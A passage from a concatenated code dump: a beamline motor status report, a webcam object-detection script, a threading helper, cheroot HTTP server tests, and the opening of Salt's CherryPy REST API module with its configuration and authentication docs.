p.user_offset_dir.value motor_unit = p.motor_egu.value except Exception as exc: encoder = ( counts ) = ( motor_res ) = ( encoder_res ) = ( motor_velocity ) = ( motor_stat ) = motor_stat = offset_dir = motor_unit = exc.__class__.__name__ else: encoder = np.round(encoder, decimals=prec) counts = np.round(counts, decimals=prec) motor_stat = "Alarmed" if motor_stat else "Normal" motor_res = format(motor_res, ".5e") encoder_res = format(encoder_res, ".5e") motor_velocity = np.round(motor_velocity, decimals=prec) else: value = v.__class__.__name__ # e.g. 'DisconnectedError' low_limit = ( high_limit ) = ( offset ) = encoder = counts = motor_res = encoder_res = motor_velocity = "" # encoder, counts = get_encoder(p.prefix) # tmp = p.name.split('_') # pname = '' # for i in range(len(tmp)): # pname += tmp[i] # pname += '.' # pname = pname[:-1] if p.parent: len_dif = len(p.name) - len(p.parent.name) parent_name = p.parent.name child_name = p.name[-(len_dif - 1) :] pname = parent_name + "." + child_name lines.append( LINE_FMT.format( pname, value, motor_unit, low_limit, high_limit, offset, offset_dir, encoder, counts, encoder_res, motor_res, motor_stat, ) ) lines.append("\n##########\nPZT STATUS:\n") LINE_FMT = "{: <30} {: <11} {: <11} {: <11} {: <11} {: <11} {: <11}" PZT_header = [ "Positioner", "status", "position", "P_gain", "I_gain", "D_gain", "Bender_force", ] lines.append(LINE_FMT.format(*PZT_header)) # pzt_dcm_chi2 = pzt('XF:18IDA-OP{Mir:DCM-Ax:Chi2Fine}', name='pzt_dcm_chi2',) # pzt_dcm_th2 = pzt('XF:18IDA-OP{Mir:DCM-Ax:Th2Fine}', name='pzt_dcm_th2') # pzt_tm = pzt('XF:18IDA-OP{Mir:TM-Ax:Bender}', name='pzt_tm', flag=1) # pzt_cm = pzt('XF:18IDA-OP{Mir:CM-Ax:Bender}', name='pzt_cm', flag=1) pzt_motors = [pzt_dcm_chi2, pzt_dcm_th2, pzt_tm, pzt_cm] for p in pzt_motors: # pzt_motors is defined in 13-pzt.py pzt_pos = np.round(p.pos.get(), decimals=4) pzt_p_gain = np.round(p.p_gain.get(), decimals=4) pzt_i_gain = np.round(p.i_gain.get(), decimals=4) pzt_d_gain = np.round(p.d_gain.get(), decimals=4) lines.append( LINE_FMT.format( p.name, p.stat, pzt_pos, pzt_p_gain, pzt_i_gain, pzt_d_gain, p.bender ) ) if print_on_screen: print("\n".join(lines)) else: return lines pass """ def get_encoder(motor_prefix): ENCODER = str(motor_prefix) + '.DRBV' COUNTS = str(motor_prefix) + '.RRBV' encoder = subprocess.check_output(['caget', ENCODER, '-t']).rstrip() encoder = str_convert(encoder) counts = subprocess.check_output(['caget', COUNTS, '-t']).rstrip() counts = str_convert(counts) return encoder, round(float(counts)) def get_pzt_position(pzt_prefix, flag=''): POS = str(pzt_prefix) + 'GET_POSITION' STAT = str(pzt_prefix) + 'GET_SERVO_STATE' PGAIN = str(pzt_prefix) + 'GET_SERVO_PGAIN' IGAIN = str(pzt_prefix) + 'GET_SERVO_IGAIN' DGAIN = str(pzt_prefix) + 'GET_SERVO_DGAIN' BENDER = str(pzt_prefix) + 'W-I' pos = subprocess.check_output(['caget', POS, '-t']).rstrip() pos = str_convert(pos) stat = subprocess.check_output(['caget', STAT, '-t']).rstrip() stat = str_convert(stat, 0) P_gain = subprocess.check_output(['caget', PGAIN, '-t']).rstrip() P_gain = str_convert(P_gain) I_gain = subprocess.check_output(['caget', IGAIN, '-t']).rstrip() I_gain = str_convert(I_gain) D_gain = subprocess.check_output(['caget', DGAIN, '-t']).rstrip() D_gain = str_convert(D_gain) if flag: Bender_force = subprocess.check_output(['caget', BENDER, '-t']).rstrip() Bender_force = str_convert(Bender_force) else: Bender_force = 'N/A' return stat, pos, P_gain, I_gain, D_gain, Bender_force """ def str_convert(my_string, flag=1): tmp = str(my_string) fmt = "{:3.4f}" output = tmp[2 : len(tmp) - 1] if flag: return fmt.format(float(output)) else: return output
object_detection_multithreading.py
import os import cv2 import time import argparse import numpy as np import tensorflow as tf import zmq from queue import Queue from threading import Thread from multiprocessing import Process, Queue, Pool from utils.app_utils import FPS, WebcamVideoStream, draw_boxes_and_labels from object_detection.utils import label_map_util CWD_PATH = os.getcwd() # Path to frozen detection graph. This is the actual model that is used for the object detection. MODEL_NAME = 'ssd_mobilenet_v1_coco_11_06_2017' PATH_TO_CKPT = os.path.join(CWD_PATH, 'object_detection', MODEL_NAME, 'frozen_inference_graph.pb') # List of the strings that is used to add correct label for each box. PATH_TO_LABELS = os.path.join(CWD_PATH, 'object_detection', 'data', 'mscoco_label_map.pbtxt') NUM_CLASSES = 90 # Loading label map label_map = label_map_util.load_labelmap(PATH_TO_LABELS) categories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=NUM_CLASSES, use_display_name=True) category_index = label_map_util.create_category_index(categories) def detect_objects(image_np, sess, detection_graph): # Expand dimensions since the model expects images to have shape: [1, None, None, 3] image_np_expanded = np.expand_dims(image_np, axis=0) image_tensor = detection_graph.get_tensor_by_name('image_tensor:0') # Each box represents a part of the image where a particular object was detected. boxes = detection_graph.get_tensor_by_name('detection_boxes:0') # Each score represent how level of confidence for each of the objects. # Score is shown on the result image, together with the class label. scores = detection_graph.get_tensor_by_name('detection_scores:0') classes = detection_graph.get_tensor_by_name('detection_classes:0') num_detections = detection_graph.get_tensor_by_name('num_detections:0') # Actual detection. (boxes, scores, classes, num_detections) = sess.run( [boxes, scores, classes, num_detections], feed_dict={image_tensor: image_np_expanded}) # Visualization of the results of a detection. rect_points, class_names, class_colors = draw_boxes_and_labels( boxes=np.squeeze(boxes), classes=np.squeeze(classes).astype(np.int32), scores=np.squeeze(scores), category_index=category_index, min_score_thresh=.5 ) return dict(rect_points=rect_points, class_names=class_names, class_colors=class_colors) def worker(input_q, output_q): # Load a (frozen) Tensorflow model into memory. detection_graph = tf.Graph() with detection_graph.as_default(): od_graph_def = tf.GraphDef() with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid: serialized_graph = fid.read() od_graph_def.ParseFromString(serialized_graph) tf.import_graph_def(od_graph_def, name='') sess = tf.Session(graph=detection_graph) fps = FPS().start() while True: fps.update() frame = input_q.get() frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB) output_q.put(detect_objects(frame_rgb, sess, detection_graph)) fps.stop() sess.close() #publish information about detected objects via zmq def publish_detected_object(): context = zmq.Context() socket = context.socket(zmq.PUB) addr = '127.0.0.1' # remote ip or localhost port = "5556" # same as in the pupil remote gui socket.bind("tcp://{}:{}".format(addr, port)) time.sleep(1) while True: #publish the label only if there is a fixation and label label_conf = label_q.get() print('label',label_conf.split()) if label_conf: #print(self.label, self.fixation_norm_pos) topic = 'detected_object' # this only works for one and 2 word objects for now if len(label_conf.split())==2: label = label_conf.split()[0][:-1] confidence = label_conf.split()[1][:-1] if len(label_conf.split())==3: label = label_conf.split()[0] + ' ' + label_conf.split()[1][:-1] confidence = label_conf.split()[2][:-1] print ('%s %s %s' % (topic, label, confidence)) try: socket.send_string('%s %s %s' % (topic, label, confidence)) except TypeError: socket.send('%s %s' % (topic, label, confidence)) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-src', '--source', dest='video_source', type=int, default=-1, help='Device index of the camera.') parser.add_argument('-wd', '--width', dest='width', type=int, default=1280, help='Width of the frames in the video stream.') parser.add_argument('-ht', '--height', dest='height', type=int, default=720, help='Height of the frames in the video stream.') args = parser.parse_args() input_q = Queue(2) # fps is better if queue is higher but then more lags output_q = Queue() label_q = Queue() for i in range(1): t = Thread(target=worker, args=(input_q, output_q)) t.daemon = True t.start() p = Process(target=publish_detected_object) p.daemon= True p.start() video_capture = WebcamVideoStream(src=args.video_source, width=args.width, height=args.height).start() fps = FPS().start() while True: frame = video_capture.read() input_q.put(frame) t = time.time() if output_q.empty(): pass # fill up queue else: font = cv2.FONT_HERSHEY_SIMPLEX data = output_q.get() rec_points = data['rect_points'] class_names = data['class_names'] class_colors = data['class_colors'] for point, name, color in zip(rec_points, class_names, class_colors): #print(point, name, color) print("name[0]", name[0]) label_q.put(name[0]) cv2.rectangle(frame, (int(point['xmin'] * args.width), int(point['ymin'] * args.height)), (int(point['xmax'] * args.width), int(point['ymax'] * args.height)), color, 3) cv2.rectangle(frame, (int(point['xmin'] * args.width), int(point['ymin'] * args.height)), (int(point['xmin'] * args.width) + len(name[0]) * 6, int(point['ymin'] * args.height) - 10), color, -1, cv2.LINE_AA) cv2.putText(frame, name[0], (int(point['xmin'] * args.width), int(point['ymin'] * args.height)), font, 0.3, (0, 0, 0), 1) cv2.imshow('Video', frame) fps.update() print('[INFO] elapsed time: {:.2f}'.format(time.time() - t)) if cv2.waitKey(1) & 0xFF == ord('q'): break fps.stop() print('[INFO] elapsed time (total): {:.2f}'.format(fps.elapsed())) print('[INFO] approx. FPS: {:.2f}'.format(fps.fps())) video_capture.stop() cv2.destroyAllWindows()
thread_returnvalue.py
from threading import Thread import time class WorkerThread(Thread): def __init__(self, group=None, target=None, name=None, args=(), kwargs=None, *, daemon=None): Thread.__init__(self, group, target, name, args, kwargs, daemon=daemon) self._return = None def run(self): self._return = self._target(*self._args, **self._kwargs) def join(self): Thread.join(self) return self._return def call(): result = [] time.sleep(3) for i in range(10000): result.append(i) add = sum(result) return add if __name__ == '__main__': print('程序运行。。。') worker = WorkerThread(target=call) worker.start() result = worker.join() print('程序结束:',result)
test_server.py
"""Tests for the HTTP server.""" # -*- coding: utf-8 -*- # vim: set fileencoding=utf-8 : from __future__ import absolute_import, division, print_function __metaclass__ = type from contextlib import closing import os import socket import tempfile import threading import uuid import pytest import requests import requests_unixsocket import six from six.moves import urllib from .._compat import bton, ntob from .._compat import IS_LINUX, IS_MACOS, IS_WINDOWS, SYS_PLATFORM from ..server import IS_UID_GID_RESOLVABLE, Gateway, HTTPServer from ..testing import ( ANY_INTERFACE_IPV4, ANY_INTERFACE_IPV6, EPHEMERAL_PORT, ) unix_only_sock_test = pytest.mark.skipif( not hasattr(socket, 'AF_UNIX'), reason='UNIX domain sockets are only available under UNIX-based OS', ) non_macos_sock_test = pytest.mark.skipif( IS_MACOS, reason='Peercreds lookup does not work under macOS/BSD currently.', ) @pytest.fixture(params=('abstract', 'file')) def unix_sock_file(request): """Check that bound UNIX socket address is stored in server.""" name = 'unix_{request.param}_sock'.format(**locals()) return request.getfixturevalue(name) @pytest.fixture def unix_abstract_sock(): """Return an abstract UNIX socket address.""" if not IS_LINUX: pytest.skip( '{os} does not support an abstract ' 'socket namespace'.format(os=SYS_PLATFORM), ) return b''.join(( b'\x00cheroot-test-socket', ntob(str(uuid.uuid4())), )).decode() @pytest.fixture def unix_file_sock(): """Yield a unix file socket.""" tmp_sock_fh, tmp_sock_fname = tempfile.mkstemp() yield tmp_sock_fname os.close(tmp_sock_fh) os.unlink(tmp_sock_fname) def test_prepare_makes_server_ready(): """Check that prepare() makes the server ready, and stop() clears it.""" httpserver = HTTPServer( bind_addr=(ANY_INTERFACE_IPV4, EPHEMERAL_PORT), gateway=Gateway, ) assert not httpserver.ready assert not httpserver.requests._threads httpserver.prepare() assert httpserver.ready assert httpserver.requests._threads for thr in httpserver.requests._threads: assert thr.ready httpserver.stop() assert not httpserver.requests._threads assert not httpserver.ready def test_stop_interrupts_serve(): """Check that stop() interrupts running of serve().""" httpserver = HTTPServer( bind_addr=(ANY_INTERFACE_IPV4, EPHEMERAL_PORT), gateway=Gateway, ) httpserver.prepare() serve_thread = threading.Thread(target=httpserver.serve) serve_thread.start() serve_thread.join(0.5) assert serve_thread.is_alive() httpserver.stop() serve_thread.join(0.5) assert not serve_thread.is_alive() @pytest.mark.parametrize( 'ip_addr', ( ANY_INTERFACE_IPV4, ANY_INTERFACE_IPV6, ), ) def test_bind_addr_inet(http_server, ip_addr): """Check that bound IP address is stored in server.""" httpserver = http_server.send((ip_addr, EPHEMERAL_PORT)) assert httpserver.bind_addr[0] == ip_addr assert httpserver.bind_addr[1] != EPHEMERAL_PORT @unix_only_sock_test def test_bind_addr_unix(http_server, unix_sock_file): """Check that bound UNIX socket address is stored in server.""" httpserver = http_server.send(unix_sock_file) assert httpserver.bind_addr == unix_sock_file @unix_only_sock_test def test_bind_addr_unix_abstract(http_server, unix_abstract_sock): """Check that bound UNIX abstract socket address is stored in server.""" httpserver = http_server.send(unix_abstract_sock) assert httpserver.bind_addr == unix_abstract_sock PEERCRED_IDS_URI = '/peer_creds/ids' PEERCRED_TEXTS_URI = '/peer_creds/texts' class _TestGateway(Gateway): def respond(self): req = self.req conn = req.conn req_uri = bton(req.uri) if req_uri == PEERCRED_IDS_URI: peer_creds = conn.peer_pid, conn.peer_uid, conn.peer_gid self.send_payload('|'.join(map(str, peer_creds))) return elif req_uri == PEERCRED_TEXTS_URI: self.send_payload('!'.join((conn.peer_user, conn.peer_group))) return return super(_TestGateway, self).respond() def send_payload(self, payload): req = self.req req.status = b'200 OK' req.ensure_headers_sent() req.write(ntob(payload)) @pytest.fixture def peercreds_enabled_server(http_server, unix_sock_file): """Construct a test server with ``peercreds_enabled``.""" httpserver = http_server.send(unix_sock_file) httpserver.gateway = _TestGateway httpserver.peercreds_enabled = True return httpserver @unix_only_sock_test @non_macos_sock_test def test_peercreds_unix_sock(peercreds_enabled_server): """Check that ``PEERCRED`` lookup works when enabled.""" httpserver = peercreds_enabled_server bind_addr = httpserver.bind_addr if isinstance(bind_addr, six.binary_type): bind_addr = bind_addr.decode() quoted = urllib.parse.quote(bind_addr, safe='') unix_base_uri = 'http+unix://{quoted}'.format(**locals()) expected_peercreds = os.getpid(), os.getuid(), os.getgid() expected_peercreds = '|'.join(map(str, expected_peercreds)) with requests_unixsocket.monkeypatch(): peercreds_resp = requests.get(unix_base_uri + PEERCRED_IDS_URI) peercreds_resp.raise_for_status() assert peercreds_resp.text == expected_peercreds peercreds_text_resp = requests.get(unix_base_uri + PEERCRED_TEXTS_URI) assert peercreds_text_resp.status_code == 500 @pytest.mark.skipif( not IS_UID_GID_RESOLVABLE, reason='Modules `grp` and `pwd` are not available ' 'under the current platform', ) @unix_only_sock_test @non_macos_sock_test def test_peercreds_unix_sock_with_lookup(peercreds_enabled_server): """Check that ``PEERCRED`` resolution works when enabled.""" httpserver = peercreds_enabled_server httpserver.peercreds_resolve_enabled = True bind_addr = httpserver.bind_addr if isinstance(bind_addr, six.binary_type): bind_addr = bind_addr.decode() quoted = urllib.parse.quote(bind_addr, safe='') unix_base_uri = 'http+unix://{quoted}'.format(**locals()) import grp import pwd expected_textcreds = ( pwd.getpwuid(os.getuid()).pw_name, grp.getgrgid(os.getgid()).gr_name, ) expected_textcreds = '!'.join(map(str, expected_textcreds)) with requests_unixsocket.monkeypatch(): peercreds_text_resp = requests.get(unix_base_uri + PEERCRED_TEXTS_URI) peercreds_text_resp.raise_for_status() assert peercreds_text_resp.text == expected_textcreds @pytest.mark.skipif( IS_WINDOWS, reason='This regression test is for a Linux bug, ' 'and the resource module is not available on Windows', ) @pytest.mark.parametrize( 'resource_limit', ( 1024, 2048, ), indirect=('resource_limit',), ) @pytest.mark.usefixtures('many_open_sockets') def test_high_number_of_file_descriptors(resource_limit): """Test the server does not crash with a high file-descriptor value. This test shouldn't cause a server crash when trying to access file-descriptor higher than 1024. The earlier implementation used to rely on ``select()`` syscall that doesn't support file descriptors with numbers higher than 1024. """ # We want to force the server to use a file-descriptor with # a number above resource_limit # Create our server httpserver = HTTPServer( bind_addr=(ANY_INTERFACE_IPV4, EPHEMERAL_PORT), gateway=Gateway, ) httpserver.prepare() try: # This will trigger a crash if select() is used in the implementation httpserver.tick() except: # noqa: E722 raise # only needed for `else` to work else: # We use closing here for py2-compat with closing(socket.socket()) as sock: # Check new sockets created are still above our target number assert sock.fileno() >= resource_limit finally: # Stop our server httpserver.stop() if not IS_WINDOWS: test_high_number_of_file_descriptors = pytest.mark.forked( test_high_number_of_file_descriptors, ) @pytest.fixture def resource_limit(request): """Set the resource limit two times bigger then requested.""" resource = pytest.importorskip( 'resource', reason='The "resource" module is Unix-specific', ) # Get current resource limits to restore them later soft_limit, hard_limit = resource.getrlimit(resource.RLIMIT_NOFILE) # We have to increase the nofile limit above 1024 # Otherwise we see a 'Too many files open' error, instead of # an error due to the file descriptor number being too high resource.setrlimit( resource.RLIMIT_NOFILE, (request.param * 2, hard_limit), ) try: # noqa: WPS501 yield request.param finally: # Reset the resource limit back to the original soft limit resource.setrlimit(resource.RLIMIT_NOFILE, (soft_limit, hard_limit)) @pytest.fixture def many_open_sockets(resource_limit): """Allocate a lot of file descriptors by opening dummy sockets.""" # Hoard a lot of file descriptors by opening and storing a lot of sockets test_sockets = [] # Open a lot of file descriptors, so the next one the server # opens is a high number try: for i in range(resource_limit): sock = socket.socket() test_sockets.append(sock) # If we reach a high enough number, we don't need to open more if sock.fileno() >= resource_limit: break # Check we opened enough descriptors to reach a high number the_highest_fileno = test_sockets[-1].fileno() assert the_highest_fileno >= resource_limit yield the_highest_fileno finally: # Close our open resources for test_socket in test_sockets: test_socket.close()
app.py
# encoding: utf-8 ''' A REST API for Salt =================== .. versionadded:: 2014.7.0 .. py:currentmodule:: salt.netapi.rest_cherrypy.app :depends: - CherryPy Python module. Version 3.2.3 is currently recommended when SSL is enabled, since this version worked the best with SSL in internal testing. Versions 3.2.3 - 4.x can be used if SSL is not enabled. Be aware that there is a known `SSL error <https://bitbucket.org/cherrypy/cherrypy/issue/1298/ssl-not-working>`_ introduced in version 3.2.5. The issue was reportedly resolved with CherryPy milestone 3.3, but the patch was committed for version 3.6.1. :optdepends: - ws4py Python module for websockets support. :client_libraries: - Java: https://github.com/SUSE/saltstack-netapi-client-java - Python: https://github.com/saltstack/pepper :configuration: All authentication is done through Salt's :ref:`external auth <acl-eauth>` system which requires additional configuration not described here. Example production-ready configuration; add to the Salt master config file and restart the ``salt-master`` and ``salt-api`` daemons: .. code-block:: yaml rest_cherrypy: port: 8000 ssl_crt: /etc/pki/tls/certs/localhost.crt ssl_key: /etc/pki/tls/certs/localhost.key Using only a secure HTTPS connection is strongly recommended since Salt authentication credentials will be sent over the wire. A self-signed certificate can be generated using the :py:func:`~salt.modules.tls.create_self_signed_cert` execution function. Running this function requires pyOpenSSL and the ``salt-call`` script is available in the ``salt-minion`` package. .. code-block:: bash salt-call --local tls.create_self_signed_cert All available configuration options are detailed below. These settings configure the CherryPy HTTP server and do not apply when using an external server such as Apache or Nginx. port **Required** The port for the webserver to listen on. host : ``0.0.0.0`` The socket interface for the HTTP server to listen on. debug : ``False`` Starts the web server in development mode. It will reload itself when the underlying code is changed and will output more debugging info. ssl_crt The path to a SSL certificate. (See below) ssl_key The path to the private key for your SSL certificate. (See below) disable_ssl A flag to disable SSL. Warning: your Salt authentication credentials will be sent in the clear! webhook_disable_auth : False The :py:class:`Webhook` URL requires authentication by default but external services cannot always be configured to send authentication. See the Webhook documentation for suggestions on securing this interface. webhook_url : /hook Configure the URL endpoint for the :py:class:`Webhook` entry point. thread_pool : ``100`` The number of worker threads to start up in the pool. socket_queue_size : ``30`` Specify the maximum number of HTTP connections to queue. expire_responses : True Whether to check for and kill HTTP responses that have exceeded the default timeout. max_request_body_size : ``1048576`` Maximum size for the HTTP request body. collect_stats : False Collect and report statistics about the CherryPy server Reports are available via the :py:class:`Stats` URL. static A filesystem path to static HTML/JavaScript/CSS/image assets. static_path : ``/static`` The URL prefix to use when serving static assets out of the directory specified in the ``static`` setting. app A filesystem path to an HTML file that will be served as a static file. This is useful for bootstrapping a single-page JavaScript app. app_path : ``/app`` The URL prefix to use for serving the HTML file specified in the ``app`` setting. This should be a simple name containing no slashes. Any path information after the specified path is ignored; this is useful for apps that utilize the HTML5 history API. root_prefix : ``/`` A URL path to the main entry point for the application. This is useful for serving multiple applications from the same URL. .. _rest_cherrypy-auth: Authentication -------------- Authentication is performed by passing a session token with each request. Tokens are generated via the :py:class:`Login` URL. The token may be sent in one of two ways: * Include a custom header named :mailheader:`X-Auth-Token`. For example, using curl: .. code-block:: bash curl -sSk https://localhost:8000/login \ -H 'Accept: application/x-yaml' \ -d username=saltdev \ -d password=saltdev \ -d eauth=auto Copy the ``token`` value from the output and include it in subsequent requests: .. code-block:: bash curl -sSk https://localhost:8000 \ -H 'Accept: application/x-yaml' \ -H 'X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079'\ -d client=local \ -d tgt='*' \ -d fun=test.ping * Sent via a cookie. This option is a convenience for HTTP clients that automatically handle cookie support (such as browsers). For example, using curl: .. code-block:: bash # Write the cookie file: curl -sSk https://localhost:8000/login \ -c ~/cookies.txt \ -H 'Accept: application/x-yaml' \ -d username=saltdev \ -d password=saltdev \ -d eauth=auto # Read the cookie file: curl -sSk https://localhost:8000 \ -b ~/cookies.txt \ -H 'Accept: application/x-yaml' \ -d client=local \ -d tgt='*' \ -d fun=test.ping .. seealso:: You can bypass the session handling via the :py:class:`Run` URL. Usage ----- Commands are sent to a running Salt master via this module by sending HTTP requests to the URLs detailed below. .. admonition:: Content negotiation This REST interface is flexible in what data formats it will accept as well as what formats it will return (e.g., JSON, YAML, x-www-form-urlencoded). * Specify the format of data in the request body by including the :mailheader:`Content-Type` header. * Specify the desired data format for the response body with the :mailheader:`Accept` header. Data sent in :http:method:`post` and :http:method:`put` requests must be in the format of a list of lowstate dictionaries. This allows multiple commands to be executed in a single HTTP request. The order of commands in the request corresponds to the return for each command in the response. Lowstate, broadly, is a dictionary of values that are mapped to a function call. This pattern is used pervasively throughout Salt. The functions called from netapi modules are described in :ref:`Client Interfaces <netapi-clients>`. The following example (in JSON format) causes Salt to execute two commands, a command sent to minions as well as a runner function on the master:: [{ "client": "local", "tgt": "*", "fun": "test.fib", "arg": ["10"] }, { "client": "runner", "fun": "jobs.lookup_jid", "jid": "20130603122505459265" }] .. admonition:: x-www-form-urlencoded Sending JSON or YAML in the request body is simple and most flexible, however sending data in urlencoded format is also supported with the caveats below. It is the default format for HTML forms, many JavaScript libraries, and the :command:`curl` command. For example, the equivalent to running ``salt '*' test.ping`` is sending ``fun=test.ping&arg&client=local&tgt=*`` in the HTTP request body. Caveats: * Only a single command may be sent per HTTP request. * Repeating the ``arg`` parameter multiple times will cause those parameters to be combined into a single list. Note, some popular frameworks and languages (notably jQuery, PHP, and Ruby on Rails) will automatically append empty brackets onto repeated parameters. E.g., ``arg=one``, ``arg=two`` will be sent as ``arg[]=one``, ``arg[]=two``. This is not supported; send JSON or YAML instead. .. |req_token| replace:: a session token from :py:class:`~Login`. .. |req_accept| replace:: the desired response format. .. |req_ct| replace:: the format of the request body. .. |res_ct| replace:: the format of the response body; depends on the :mailheader:`Accept` request header. .. |200| replace:: success .. |401| replace:: authentication required .. |406| replace:: requested Content-Type not available ''' # We need a custom pylintrc here... # pylint: disable=W0212,E1101,C0103,R0201,W0221,W0613 # Import Python libs from __future__ import absolute_import import collections import itertools import functools import logging import json import StringIO import tarfile import time from multiprocessing import Process, Pipe # Import third-party libs # pylint: disable=import-error import cherrypy from cherrypy.lib import cpstats import yaml import salt.ext.six as six # pylint: enable=import-error # Import Salt libs import salt import salt.auth import salt.utils.event # Import salt-api libs import salt.netapi logger = logging.getLogger(__name__) # Imports related to websocket try: from .tools import websockets from . import event_processor HAS_WEBSOCKETS = True except ImportError: websockets = type('websockets', (object,), { 'SynchronizingWebsocket': None, }) HAS_WEBSOCKETS = False def html_override_tool(): ''' Bypass the normal handler and serve HTML for all URLs The ``app_path`` setting must be non-empty and the request must ask for ``text/html`` in the ``Accept`` header. ''' apiopts = cherrypy.config['apiopts'] request = cherrypy.request url_blacklist = ( apiopts.get('app_path', '/app'), apiopts.get('static_path', '/static'), ) if 'app' not in cherrypy.config['apiopts']: return if request.path_info.startswith(url_blacklist): return if request.headers.get('Accept') == '*/*': return try: wants_html = cherrypy.lib.cptools.accept('text/html') except cherrypy.HTTPError: return else: if wants_html != 'text/html': return raise cherrypy.InternalRedirect(apiopts.get('app_path', '/app')) def salt_token_tool(): ''' If the custom authentication header is supplied, put it in the cookie dict so the rest of the session-based auth works as intended ''' x_auth = cherrypy.request.headers.get('X-Auth-Token', None) # X-Auth-Token header trumps session cookie if x_auth: cherrypy.request.cookie['session_id'] = x_auth def salt_ip_verify_tool(): ''' If there is a list of restricted IPs, verify current client is coming from one of those IPs. ''' # This is overly cumbersome and crude, # But, it's also safe... ish... salt_config = cherrypy.config.get('saltopts', None) if salt_config: cherrypy_conf = salt_config.get('rest_cherrypy', None) if cherrypy_conf: auth_ip_list = cherrypy_conf.get('authorized_ips', None) if auth_ip_list: logger.debug("Found IP list: {0}".format(auth_ip_list)) rem_ip = cherrypy.request.headers.get('Remote-Addr', None) logger.debug("Request from IP: {0}".format(rem_ip)) if rem_ip not in auth_ip_list: logger.error("Blocked IP: {0}".format(rem_ip)) cherrypy.response.status = 403 return { 'status': cherrypy.response.status, 'return': "Bad IP", } def salt_auth_tool(): ''' Redirect all unauthenticated requests to the login page ''' # Redirect to the login page if the session hasn't been authed if 'token' not in cherrypy.session: # pylint: disable=W8601 raise cherrypy.HTTPError(401) # Session is authenticated; inform caches cherrypy.response.headers['Cache-Control'] = 'private' def cors_handler(*args, **kwargs): ''' Check a CORS preflight request and return a valid response ''' req_head = cherrypy.request.headers resp_head = cherrypy.response.headers ac_method = req_head.get('Access-Control-Request-Method', None) allowed_methods = ['GET', 'POST'] allowed_headers = ['X-Auth-Token', 'Content-Type'] if ac_method and ac_method in allowed_methods: resp_head['Access-Control-Allow-Methods'] = ', '.join(allowed_methods) resp_head['Access-Control-Allow-Headers'] = ', '.join(allowed_headers) resp_head['Connection'] = 'keep-alive' resp_head['Access-Control-Max-Age'] = '1400' return {} def cors_tool(): ''' Handle both simple and complex CORS requests Add CORS headers to each response. If the request is a CORS preflight request swap out the default handler with a simple, single-purpose handler that verifies the request and provides a valid CORS response. ''' req_head = cherrypy.request.headers resp_head = cherrypy.response.headers # Always set response headers necessary for 'simple' CORS. resp_head['Access-Control-Allow-Origin'] = req_head.get('Origin', '*') resp_head['Access-Control-Expose-Headers'] = 'GET, POST' resp_head['Access-Control-Allow-Credentials'] = 'true' # If this is a non-simple CORS preflight request swap out the handler. if cherrypy.request.method == 'OPTIONS': cherrypy.serving.request.handler = cors_handler # Be conservative in what you send # Maps Content-Type to serialization functions; this is a tuple of tuples to # preserve order of preference. ct_out_map = ( ('application/json', json.dumps), ('application/x-yaml', functools.partial( yaml.safe_dump, default_flow_style=False)), ) def hypermedia_handler(*args, **kwargs): ''' Determine the best output format based on the Accept header, execute the regular handler, and transform the output to the request content type (even if it's an error). :param args: Pass args through to the main handler :param kwargs: Pass kwargs through to the main handler ''' # Execute the real handler. Handle or pass-through any errors we know how # to handle (auth & HTTP errors). Reformat any errors we don't know how to # handle as a data structure. try: cherrypy.response.processors = dict(ct_out_map) ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs) except (salt.exceptions.EauthAuthenticationError, salt.exceptions.TokenAuthenticationError): raise cherrypy.HTTPError(401) except (salt.exceptions.SaltDaemonNotRunning, salt.exceptions.SaltReqTimeoutError) as exc: raise cherrypy.HTTPError(503, exc.strerror) except cherrypy.CherryPyException: raise except Exception as exc: import traceback logger.debug("Error while processing request for: %s", cherrypy.request.path_info, exc_info=True) cherrypy.response.status = 500 ret = { 'status': cherrypy.response.status, 'return': '{0}'.format(traceback.format_exc(exc)) if cherrypy.config['debug'] else "An unexpected error occurred"} # Raises 406 if requested content-type is not supported best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map]) # Transform the output from the handler into the requested output format cherrypy.response.headers['Content-Type'] = best out = cherrypy.response.processors[best] return out(ret) def hypermedia_out(): ''' Determine the best handler for the requested content type Wrap the normal handler and transform the output from that handler into the requested content type ''' request = cherrypy.serving.request request._hypermedia_inner_handler = request.handler request.handler = hypermedia_handler @functools.wraps def process_request_body(fn): ''' A decorator to skip a processor function if process_request_body is False ''' def wrapped(*args, **kwargs): # pylint: disable=C0111 if cherrypy.request.process_request_body is not False: fn(*args, **kwargs) return wrapped def urlencoded_processor(entity): ''' Accept x-www-form-urlencoded data (run through CherryPy's formatter) and reformat it into a Low State data structure. Since we can't easily represent complicated data structures with key-value pairs, any more complicated requirements (e.g. compound commands) must instead be delivered via JSON or YAML. For example:: .. code-block:: bash curl -si localhost:8000 -d client=local -d tgt='*' \\ -d fun='test.kwarg' -d arg='one=1' -d arg='two=2' :param entity: raw POST data ''' # First call out to CherryPy's default processor cherrypy._cpreqbody.process_urlencoded(entity) cherrypy.serving.request.unserialized_data = entity.params cherrypy.serving.request.raw_body = '' @process_request_body def json_processor(entity): ''' Unserialize raw POST data in JSON format to a Python data structure. :param entity: raw POST data ''' body = entity.fp.read() try: cherrypy.serving.request.unserialized_data = json.loads(body) except ValueError: raise cherrypy.HTTPError(400, 'Invalid JSON document') cherrypy.serving.request.raw_body = body @process_request_body def yaml_processor(entity): ''' Unserialize raw POST data in YAML format to a Python data structure. :param entity: raw POST data ''' body = entity.fp.read() try: cherrypy.serving.request.unserialized_data = yaml.safe_load(body) except ValueError: raise cherrypy.HTTPError(400, 'Invalid YAML document') cherrypy.serving.request.raw_body = body @process_request_body def text_processor(entity): ''' Attempt to unserialize plain text as JSON Some large services still send JSON with a text/plain Content-Type. Those services are bad and should feel bad. :param entity: raw POST data ''' body = entity.fp.read() try: cherrypy.serving.request.unserialized_data = json.loads(body) except ValueError: cherrypy.serving.request.unserialized_data = body cherrypy.serving.request.raw_body = body def hypermedia_in(): ''' Unserialize POST/PUT data of a specified Content-Type. The following custom processors all are intended to format Low State data and will place that data structure into the request object. :raises HTTPError: if the request contains a Content-Type that we do not have a processor for ''' # Be liberal in what you accept ct_in_map = { 'application/x-www-form-urlencoded': urlencoded_processor, 'application/json': json_processor, 'application/x-yaml': yaml_processor, 'text/yaml': 